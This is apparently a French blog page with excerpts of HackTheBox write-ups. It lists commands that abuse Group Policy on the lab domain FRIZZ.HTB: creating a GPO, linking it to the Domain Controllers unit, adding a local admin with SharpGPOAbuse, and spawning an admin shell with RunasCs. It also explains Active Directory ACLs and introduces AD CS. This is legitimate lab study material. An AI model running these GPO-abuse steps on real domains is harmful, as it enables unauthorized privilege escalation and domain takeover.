Eureka-HTB
Difficulte : esay
Difficulte : esay
Ceci est un exemple de post pour tester Hugo avec le thème PaperMod.
SharpGPOAbuse.exe 1. commande PowerShell utilisée pour créer un nouvel objet de stratégie de group New-GPO -Name "pwnedGPO 2.creer un nouveau GPO nommé evil et lié à l’unité d’organisation des contrôleurs de domaine. New-GPO -Name PwnedGPO | New-GPLink -Target "OU=DOMAIN CONTROLLERS,D C=FRIZZ,DC=HTB" -LinkEnabled Yes 3. Modifier l’objet de stratégie de groupe pour ajouter un administrateur local .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Users>--GPO Name PwnedGPO 4.Force GPO Update gpupdate /force 5.Spawn Administrative Shell RunasCs.exe pour lancer un shell cmd.exe avec les identifiants ...
exploitation des vulnérabilités du contrôle d’accès Windows/Active Directory pour l’élévation des privilèges, la persistance et les mouvements latéraux. Couvre les techniques offensives d’abus des ACL, l’analyse BloodHound et les méthodes de renforcement défensif pour les équipes de sécurité des entreprises. Une liste de contrôle d’accès (ACL) est une liste d’ entrées de contrôle d’accès (ACE). Chaque ACE d’une ACL identifie un administrateur et spécifie les droits d’accès autorisés, refusés ou audités pour cet administrateur. Le descripteur de sécurité d’un objet sécurisable peut contenir deux types d’ACL : une DACL et une SACL . Une liste de contrôle d’accès discrétionnaire (DACL) identifie les personnes autorisées ou non à accéder à un objet sécurisable. Lorsqu’un processus tente d’accéder à un objet sécurisable, le système vérifie les ACE de la DACL de l’objet afin de déterminer s’il doit y accéder. DAC La méthode traditionnelle de mise en œuvre du contrôle d’accès contrôle l’accès en fonction de l’identité du demandeur et des règles d’accès qui précisent ce que les demandeurs sont autorisés à faire (ou non). Ce contrôle d’accès est discrétionnaire , car une entité peut disposer de droits d’accès lui permettant, de son propre chef, d’autoriser une autre entité à accéder à une ressource ; contrairement à MAC , où l’entité ayant accès à une ressource ne peut pas, de son propre chef, autoriser une autre entité à y accéder. Windows est un exemple de système d’exploitation DAC , qui utilise des listes de contrôle d’accès discrétionnaires ( DACL ). ...
AD CS est un rôle serveur qui fonctionne comme l’implémentation de l’infrastructure à clés publiques PKI de Microsoft. Comme prévu, il s’intègre étroitement à Active Directory et permet l’émission de certificats, qui sont des documents électroniques signés numériquement au format X.509, utilisables pour le chiffrement, la signature de messages et/ou l’authentification (notre axe de recherche). https://github.com/GhostPack/PSPKIAudit https://posts.specterops.io/certified-pre-owned-d95910965cd2